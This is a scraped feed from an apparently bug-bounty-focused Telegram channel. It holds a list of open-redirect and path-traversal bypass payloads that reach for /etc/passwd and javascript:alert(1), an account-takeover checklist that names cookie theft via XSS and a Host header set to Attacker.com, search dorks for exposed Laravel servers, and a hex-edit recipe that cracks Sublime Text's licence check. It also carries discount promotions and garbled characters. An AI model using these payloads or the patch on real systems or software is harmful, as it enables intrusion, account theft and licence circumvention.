Brut Security
๐ ๐๐ฎ๐ ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐๐ญ๐๐ซ๐ญ๐๐ซ ๐๐๐๐ค ๐ ๐๐๐ง๐ญ ๐๐๐๐๐ฌ๐ฌ ๐ญ๐จ ๐๐ฎ๐ ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐๐ซ๐จ๐ ๐ซ๐๐ฆ๐ฌ, ๐๐ฅ๐๐ญ๐๐จ๐ซ๐ฆ๐ฌ, ๐๐ฎ๐ข๐๐๐ฌ, ๐๐จ๐จ๐ค๐ฌ, ๐๐ง๐ ๐๐๐๐ฅ ๐๐๐ฉ๐จ๐ซ๐ญ๐ฌ? ๐Do Follow+โค๏ธLike+๐Retweet+๐ฌDM "Bounty" on @brutsecurity_bot #BugBounty #BugBountyTips
Click on this button, you will get the materials @brutsecurity_bot
โค2๐ฟ1
Brut Security pinned ยซ๐ ๐๐ฎ๐ ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐๐ญ๐๐ซ๐ญ๐๐ซ ๐๐๐๐ค ๐ ๐๐๐ง๐ญ ๐๐๐๐๐ฌ๐ฌ ๐ญ๐จ ๐๐ฎ๐ ๐๐จ๐ฎ๐ง๐ญ๐ฒ ๐๐ซ๐จ๐ ๐ซ๐๐ฆ๐ฌ, ๐๐ฅ๐๐ญ๐๐จ๐ซ๐ฆ๐ฌ, ๐๐ฎ๐ข๐๐๐ฌ, ๐๐จ๐จ๐ค๐ฌ, ๐๐ง๐ ๐๐๐๐ฅ ๐๐๐ฉ๐จ๐ซ๐ญ๐ฌ? ๐Do Follow+โค๏ธLike+๐Retweet+๐ฌDM "Bounty" on @brutsecurity_bot #BugBounty #BugBountyTipsยป
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //[email protected]/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- https://0177.0.0.1/
- https://00177.0000.0000.0001/
9. IP address variants:
- https://3232235777 (decimal notation of an IP)
- https://0xC0A80001 (hex notation of IP)
- https://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- https://[::1]/
- https://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- https://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=https://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:[email protected]/
- https://@google.com
22. Combination of userinfo and traversal:
- https://admin:[email protected]/../../etc/passwd
Please open Telegram to view this post
VIEW IN TELEGRAM
1โค5๐3๐ฟ1
๐ ๐ฃ๐ผ๐น๐น ๐ง๐ถ๐บ๐ฒ: ๐๐ฟ๐ฒ ๐ฌ๐ผ๐ ๐ฅ๐ฒ๐ฎ๐ฑ๐ ๐ณ๐ผ๐ฟ ๐ฃ๐ฟ๐ผ ๐๐ฎ๐ฏ๐? ๐
๐๐ฒ๐ ๐ต๐ฎ๐ฐ๐ธ๐ฒ๐ฟ๐! ๐ ๐๐ฒ๐โ๐ ๐๐ฒ๐ฒ ๐๐ต๐ฒ๐ฟ๐ฒ ๐ฒ๐๐ฒ๐ฟ๐๐ผ๐ป๐ฒ ๐๐๐ฎ๐ป๐ฑ๐ ๐ถ๐ป ๐๐ต๐ฒ๐ถ๐ฟ ๐ต๐ฎ๐ฐ๐ธ๐ถ๐ป๐ด ๐ท๐ผ๐๐ฟ๐ป๐ฒ๐! ๐๐ฎ๐ฐ๐ธ ๐ง๐ต๐ฒ ๐๐ผ๐ โ๐ ๐ฃ๐ฟ๐ผ ๐๐ฎ๐ฏ๐ ๐ผ๐ณ๐ณ๐ฒ๐ฟ ๐ฟ๐ฒ๐ฎ๐น-๐๐ผ๐ฟ๐น๐ฑ ๐ฟ๐ฒ๐ฑ ๐๐ฒ๐ฎ๐บ๐ถ๐ป๐ด ๐ถ๐ป ๐ฒ๐ป๐๐ฒ๐ฟ๐ฝ๐ฟ๐ถ๐๐ฒ ๐ฒ๐ป๐๐ถ๐ฟ๐ผ๐ป๐บ๐ฒ๐ป๐๐ โ ๐ฎ ๐ฏ๐ถ๐ด ๐๐๐ฒ๐ฝ ๐๐ฝ ๐ถ๐ณ ๐๐ผ๐โ๐ฟ๐ฒ ๐น๐ผ๐ผ๐ธ๐ถ๐ป๐ด ๐๐ผ ๐๐ฎ๐ธ๐ฒ ๐๐ผ๐๐ฟ ๐๐ธ๐ถ๐น๐น๐ ๐๐ผ ๐๐ต๐ฒ ๐ป๐ฒ๐ ๐ ๐น๐ฒ๐๐ฒ๐น.
๐ ๐ฉ๐ผ๐๐ฒ ๐ฎ๐ป๐ฑ ๐๐ฒ๐ฒ ๐๐ต๐ฒ๐ฟ๐ฒ ๐๐ผ๐ ๐๐๐ฎ๐ป๐ฑ ๐๐ถ๐๐ต ๐๐ต๐ฒ ๐ฐ๐ผ๐บ๐บ๐๐ป๐ถ๐๐! #๐๐๐ฏ๐ฒ๐ฟ๐๐ฒ๐ฐ๐๐ฟ๐ถ๐๐ #๐๐ฎ๐ฐ๐ธ๐ถ๐ป๐ด #๐ฃ๐ฟ๐ผ๐๐ฎ๐ฏ๐ #๐๐ฎ๐ฐ๐ธ๐ง๐ต๐ฒ๐๐ผ๐
๐๐ฒ๐ ๐ต๐ฎ๐ฐ๐ธ๐ฒ๐ฟ๐! ๐ ๐๐ฒ๐โ๐ ๐๐ฒ๐ฒ ๐๐ต๐ฒ๐ฟ๐ฒ ๐ฒ๐๐ฒ๐ฟ๐๐ผ๐ป๐ฒ ๐๐๐ฎ๐ป๐ฑ๐ ๐ถ๐ป ๐๐ต๐ฒ๐ถ๐ฟ ๐ต๐ฎ๐ฐ๐ธ๐ถ๐ป๐ด ๐ท๐ผ๐๐ฟ๐ป๐ฒ๐! ๐๐ฎ๐ฐ๐ธ ๐ง๐ต๐ฒ ๐๐ผ๐ โ๐ ๐ฃ๐ฟ๐ผ ๐๐ฎ๐ฏ๐ ๐ผ๐ณ๐ณ๐ฒ๐ฟ ๐ฟ๐ฒ๐ฎ๐น-๐๐ผ๐ฟ๐น๐ฑ ๐ฟ๐ฒ๐ฑ ๐๐ฒ๐ฎ๐บ๐ถ๐ป๐ด ๐ถ๐ป ๐ฒ๐ป๐๐ฒ๐ฟ๐ฝ๐ฟ๐ถ๐๐ฒ ๐ฒ๐ป๐๐ถ๐ฟ๐ผ๐ป๐บ๐ฒ๐ป๐๐ โ ๐ฎ ๐ฏ๐ถ๐ด ๐๐๐ฒ๐ฝ ๐๐ฝ ๐ถ๐ณ ๐๐ผ๐โ๐ฟ๐ฒ ๐น๐ผ๐ผ๐ธ๐ถ๐ป๐ด ๐๐ผ ๐๐ฎ๐ธ๐ฒ ๐๐ผ๐๐ฟ ๐๐ธ๐ถ๐น๐น๐ ๐๐ผ ๐๐ต๐ฒ ๐ป๐ฒ๐ ๐ ๐น๐ฒ๐๐ฒ๐น.
๐ ๐ฉ๐ผ๐๐ฒ ๐ฎ๐ป๐ฑ ๐๐ฒ๐ฒ ๐๐ต๐ฒ๐ฟ๐ฒ ๐๐ผ๐ ๐๐๐ฎ๐ป๐ฑ ๐๐ถ๐๐ต ๐๐ต๐ฒ ๐ฐ๐ผ๐บ๐บ๐๐ป๐ถ๐๐! #๐๐๐ฏ๐ฒ๐ฟ๐๐ฒ๐ฐ๐๐ฟ๐ถ๐๐ #๐๐ฎ๐ฐ๐ธ๐ถ๐ป๐ด #๐ฃ๐ฟ๐ผ๐๐ฎ๐ฏ๐ #๐๐ฎ๐ฐ๐ธ๐ง๐ต๐ฒ๐๐ผ๐
๐11โค2
๐ ๐ช๐ต๐ถ๐ฐ๐ต ๐ฏ๐ฒ๐๐ ๐ฑ๐ฒ๐๐ฐ๐ฟ๐ถ๐ฏ๐ฒ๐ ๐๐ผ๐?
Anonymous Poll
45%
Beginner โ Iโm still learning the basics.
29%
Intermediate โ Iโm comfortable with CTFs and regular HTB labs.
18%
Advanced โ Iโm looking for real-world, red team experiences.
8%
Pro โ Iโm ready to dive into Pro Labs and tackle enterprise-level challenges!
๐ Unlock That 20% Pro Labs Discount! ๐
Alright, hackers, hereโs the deal: Hack The Box Pro Labs just got REAL! ๐ฅ If youโre ready to leave the beginner stuff in the dust and dive into legit red team missions, Iโve got an exclusive 20% off waiting for you. But hereโs the catch โ only 100 of you can snag this deal. ๐
๐ฅ Use code:brutsecurityprolabs20 at checkout for 20% off the annual Pro Labs subscription! Itโs high-level hacking in real enterprise environments. Ready to go pro? ๐ถ๏ธ
๐Checkout Here - https://hackthebox.com/hacker/pro-labs
Jump on this quick โ or you might miss the boat. ๐ค๐จ #HackTheBox #LevelUp #ProLabs
Alright, hackers, hereโs the deal: Hack The Box Pro Labs just got REAL! ๐ฅ If youโre ready to leave the beginner stuff in the dust and dive into legit red team missions, Iโve got an exclusive 20% off waiting for you. But hereโs the catch โ only 100 of you can snag this deal. ๐
๐ฅ Use code:
๐Checkout Here - https://hackthebox.com/hacker/pro-labs
Jump on this quick โ or you might miss the boat. ๐ค๐จ #HackTheBox #LevelUp #ProLabs
Hack The Box
Elite Red Team Training Labs For Offensive Security Red Teaming
Practice offensive cybersecurity by penetrating complex, realistic scenarios. Red team training with labs and a certificate of completion. Browse HTB Pro Labs!
โค2๐ฅ2๐1๐ฟ1
Brut Security pinned ยซ๐ Unlock That 20% Pro Labs Discount! ๐ Alright, hackers, hereโs the deal: Hack The Box Pro Labs just got REAL! ๐ฅ If youโre ready to leave the beginner stuff in the dust and dive into legit red team missions, Iโve got an exclusive 20% off waiting for you.โฆยป
@TheSecOpsGroup have dropped an incredible Black Friday deal โ 90% OFF on ALL pentesting exams with: no expiration dates, 3 different categories, and exams based on real-world scenarios!
Use Discount Code:BLACKFRIDAY-90
https://secops.group/pentesting-exams/
Use Discount Code:
https://secops.group/pentesting-exams/
๐ฅ3๐1
1. Pre-Account Takeover
- How to Hunt:
- Register an email without verifying it.
- Register again using a different method (e.g., 'sign up with Google') with the same email.
- Check if the application links both accounts.
- Try logging in to see if you can access information from the other account.
2. Account Takeover due to Improper Rate Limiting
- How to Hunt:
- Capture the login request.
- Use tools like Burp Suite's Intruder to brute-force the login.
- Analyze the response and length to detect anomalies.
3. Account Takeover by Utilizing Sensitive Data Exposure
- How to Hunt:
- Pay attention to the request and response parts of the application.
- Look for exposed sensitive data like OTPs, hashes, or passwords.
4. Login Vulnerabilities
- Check for:
- Brute-force vulnerabilities.
- OAuth misconfigurations.
- OTP brute-forcing.
- JWT misconfigurations.
- SQL injection to bypass authentication.
- Proper validation of OTP or tokens.
5. Password Reset Vulnerabilities
- Check for:
- Brute-force vulnerabilities in password reset OTPs.
- Predictable tokens.
- JWT misconfigurations.
- IDOR vulnerabilities.
- Host header injection.
- Leaked tokens or OTPs in HTTP responses.
- Proper validation of OTP or tokens.
- HTTP parameter pollution (HPP).
6. XSS to Account Takeover
- How to Hunt:
- Try to exfiltrate cookies or auth tokens.
- Craft XSS payloads to change user email or password.
7. CSRF to Account Takeover
- Check for:
- Vulnerabilities in email update endpoints.
- Vulnerabilities in password change endpoints.
8. IDOR to Account Takeover
- Check for:
- Vulnerabilities in email update endpoints.
- Vulnerabilities in password change endpoints.
- Vulnerabilities in password reset endpoints.
9. Account Takeover by Response & Status Code Manipulation- How to Hunt:
- Look for vulnerabilities where manipulating response or status codes can lead to account takeover.
10. Account Takeover by Exploiting Weak Cryptography- Check for:
- Weak cryptographic implementations in password reset processes.
11. Password or Email Change Function- How to Hunt:
- If you see email parameters in password change requests, try changing your email to the victim's email.
12. Sign-Up Function- How to Hunt:
- Try signing up with the target email directly. - Use third-party sign-ups with phone numbers, then link the victim's email to your account.
13. Rest Token
- How to Hunt: - Try using your REST token with the target account.
- Brute 13. Rest Token- How to Hunt:
- Try using your REST token with the target account. - Brute force the REST token if it is numeric.
- Try to figure out how the tokens are generated. For example, check if they are generated based on timestamp, user ID, or email.
14. Host Header Injection- How to Hunt:
- Intercept the REST account request. - Change the Host header value from the target site to your own domain (e.g., `POST /PassRest HTTP/1.1 Host: Attacker.com`).
15. CORS Misconfiguration to Account Takeover
- How to Hunt: - Check if the application has CORS misconfigurations.
- If so, you might be able to steal sensitive information from the user to take over their account or make them change authentication information. - Refer to [CORS Bypass](https://book.hacktricks.xyz/pentesting-web/cors-bypass) for more details.
16. Account Takeover via Leaked Session Cookie
- How to Hunt: - Look for vulnerabilities where session cookies are leaked.
- Refer to [HackerOne Report 745324](https://hackerone.com/reports/745324) for more details.
17. HTTP Request Smuggling to ATO- How to Hunt:
- Look for HTTP request smuggling vulnerabilities.
- Refer to [HackerOne Reports 737140 and 740037](https://hackerone.com/reports/737140) and [HackerOne Report 740037](https://hackerone.com/reports/740037) for more details.
Please open Telegram to view this post
VIEW IN TELEGRAM
โค11๐5
18. Bypassing Digits Origin Validation Which Leads to Account Takeover- How to Hunt:
- Look for vulnerabilities where digits origin validation can be bypassed. - Refer to [HackerOne Report 129873](https://hackerone.com/reports/129873) for more details.
19. Top ATO Reports in HackerOne
- How to Hunt: - Review top account takeover reports in HackerOne.
- Refer to [TOP ACCOUNT TAKEOVER](https://github.com/reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPACCOUNTTAKEOVER.md) for more details.
โค5
1. Run HxD as Admin.
2. Open (Ctrl + O) and find "sublime_text.exe".
3. Search > Replace (Ctrl + R) > Hex values
4. Enter the following: Search for: 80 79 05 00 0F 94 C2 -> Replace with C6 41 05 01 B2 00 90 Search direction: All -> Replace All (only 1 instance found for me).
5. Save (Ctrl + S) then exit HxD.
6. Run Sublime Text.
Please open Telegram to view this post
VIEW IN TELEGRAM
1๐7โค5๐ฅ2
site:*.host.com ext:asp
site:*.host.com ext:jsp
site:*.host.com ext:aspx
site:*.host.com ext:jspx
site:*.host.com ext:do
site:*.host.com ext:action
site:*.host.com ext:php
Please open Telegram to view this post
VIEW IN TELEGRAM
โค9๐4๐ฅ1
CVE-2024-52301: Improper Input Validation in Laravel Framework, 8.7 ratingโ๏ธ
The vulnerability allows an attacker to change environment using a special crafted query string.
More then 830k instances at Netlas.io:
๐ Link: https://nt.ls/CDJgv
๐ Dork: http.headers.set_cookie:"laravel_session="
Vendor's advisory: https://github.com/laravel/framework/security/advisories/GHSA-gv7v-rgg6-548h
The vulnerability allows an attacker to change environment using a special crafted query string.
More then 830k instances at Netlas.io:
๐ Link: https://nt.ls/CDJgv
๐ Dork: http.headers.set_cookie:"laravel_session="
Vendor's advisory: https://github.com/laravel/framework/security/advisories/GHSA-gv7v-rgg6-548h
โค3๐3๐ฅ1
Hey everyone! ๐
A big, warm welcome to all our new members! ๐ And to our amazing long-time supporters, thank you for sticking around and making this community what it is today! ๐
If youโve been finding value in the bug bounty updates, cybersecurity tips, and job opportunities I share, Iโd truly appreciate your support. โญ You can boost or give a star to Brut Securityโit keeps me motivated to keep delivering the best content for you all! ๐ป๐
Thanks for being such an incredible community. Your encouragement means everything!โค๏ธ ๐
A big, warm welcome to all our new members! ๐ And to our amazing long-time supporters, thank you for sticking around and making this community what it is today! ๐
If youโve been finding value in the bug bounty updates, cybersecurity tips, and job opportunities I share, Iโd truly appreciate your support. โญ You can boost or give a star to Brut Securityโit keeps me motivated to keep delivering the best content for you all! ๐ป๐
Thanks for being such an incredible community. Your encouragement means everything!
Please open Telegram to view this post
VIEW IN TELEGRAM
1โค9๐ฅ2